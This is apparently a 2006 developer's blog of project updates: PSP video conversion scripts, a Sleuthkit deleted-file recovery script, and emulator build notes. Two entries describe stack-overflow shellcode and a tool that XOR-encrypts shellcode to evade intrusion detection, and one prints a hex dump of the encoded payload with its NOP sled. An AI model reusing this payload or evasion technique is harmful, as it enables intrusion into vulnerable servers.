January 22nd 2006
Added support for the PMP Container format used by PMP_MOD. The perl based muxer is included in this package.
To use the PMP Container format you have to define this variables in the python script.
Encode video: python psp.py -m pmp -i file.mpg
Encode video and cleanup: python psp.py -m pmp -i file.mpg -c
Encode only 10 sec: python psp.py -m pmp-i file.mpg -c -d 10
January 15th 2006
Made quick and dirty Python script to convert videos and pictures for the PSP. Iam using FFmpeg and Imagemagick You have to edit this variables to make the script suitable for your system.
The script will try to mount the PSP and guesses the next free video filename, to avoid overwriting existing files. Also you can specify ‘-c’ to cleanup the PSP before copying the files.
Encode video: python psp.py -m vid -i file.mpg
Encode video and cleanup: python psp.py -m vid -i file.mpg -c
Encode only 10 sec: python psp.py -m vid -i file.mpg -c -d 10
Copy pictures to the PSP: python psp.py -m pic -i folder/
January 15th 2006
Wrote a little Bash script using Sleuthkit tools to recover a deleted file from a partion. Tested the script with ext2 and fat32 filesystems.
Setup a test image:
dd if=/dev/zero of=image bs=1k count=8192
mkfs.ext2 image
mount -o loop image /mnt/image
cp something /mnt/image
rm /mnt/image/something
sync
umount /mnt/image
Now you can start the script to find a token of the deleted file:
./find.sh image “Test”
The Code for find.sh
#!/bin/sh
IMAGE=$1
TOKEN=$2
BSIZE=1024
TYPE="linux-ext2"
TMP="dls_$(date +%Y%d%m_%H%M%S)"
if [ $# -ne 2 ]
then
echo "Usage: $0 image token"
exit -1
fi
if [ ! -f $IMAGE ]
then
echo "Cannot find $IMAGE"
exit -1
fi
if [ -z "$TOKEN" ]
then
echo "Pleae give search token"
exit -1
fi
echo "--------------------------"
echo "Found deleted"
fls -f $TYPE -rd $IMAGE
dls -f $TYPE $IMAGE > $TMP
strings -t d $TMP > $TMP.str
echo "--------------------------"
grep -i "$TOKEN" $TMP.str
echo "--------------------------"
echo -en "Select Offset:"
read n
ADDR=$(grep -i "$TOKEN" $TMP.str | grep "$n" | sed 's/^[ \t]*//' | head -n 1 | cut -d " " -f1)
if [ -z "$ADDR" ]
then
echo "Nothing found for '$TOKEN'"
exit -1
fi
echo "Found $ADDR"
OFFSET=$(echo "$ADDR / $BSIZE" | bc)
echo "Using Offset $OFFSET"
BLOCK=$(dcalc -f $TYPE -u $OFFSET $IMAGE)
echo "Using Block $BLOCK"
echo "----------------------------"
dcat -f $TYPE $IMAGE $BLOCK
echo
echo "----------------------------"
INODE=$(ifind -f $TYPE $IMAGE -d $BLOCK)
echo "Found Inode $INODE"
istat -f $TYPE $IMAGE $INODE
BLOCKS=$(istat -f $TYPE $IMAGE $INODE | tail -n 1)
echo "---------------------------"
echo "Found Blocks $BLOCKS"
echo "---------------------------"
(for BLOCK in $BLOCKS
do
dcat -f $TYPE $IMAGE $BLOCK
done) | tee $TMP.found
echo "---------------------------"
echo "Saved to $TMP.found"
echo "---------------------------"
rm -f $TMP $TMP.str
January 10th 2006
Made a nice shellcode using the python inlineEgg library. The shellcode is designed to smash the stack of a programm which is listen on a socket. The read buffer gets overflowed by the shellcode. The code was tested an on older SUSE9.0, because current disto use pie and ssp
Features:
Encoder to generate polymorph shellcode
January 6th 2006
Updated PSP build to reflect lastest changes of the of the Stella project. This build is done with revison 1654 of pspsdk and libsdl.
Changelog
Building
To build for the PSP, make sure psp-config is in the path and run:
./configure --host=psp
make
make psp-layout
make psp-upload
Dependencies
January 5th 2006
Updated my shellcode generation tool. Added shellcode encryption, to hide from IDS which scan for well known strings in the shellcode, like ‘/bin/sh’. The encryption is quite simple, just add,sub,xor or move by an fixed offset. The tool added also a hook to decode the shellcode before it gets called.
Changelog:
./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
------------------------------------------------------
Start: 0x0x80499a0
End: 0x0x80499c9
Len: 0x0029 (41 bytes)
jump: 0x00000000
------------------------------------------------------
Crypt Shellcode 'xor' offset='2'
------------------------------------------------------
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
------------------------------------------------------
Writing Shellcode to 'CODE'
------------------------------------------------------
Starting Subshell
setup env $CODE
------------------------------------------------------